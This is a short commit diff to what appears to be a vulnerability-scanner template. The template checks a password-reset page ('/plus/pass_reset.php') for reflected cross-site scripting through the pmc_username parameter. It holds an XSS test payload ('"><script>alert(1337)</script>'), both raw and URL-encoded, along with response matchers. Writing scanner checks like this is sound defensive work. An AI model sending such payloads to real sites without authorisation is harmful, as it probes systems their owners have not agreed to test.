updating temp
parent
895dde3b2d
commit
4d5bdb15e4
|
@ -8,12 +8,12 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username="><script>alert(1337)</script>"
|
||||
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "1337"
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
||||
|
|
Loading…
Reference in New Issue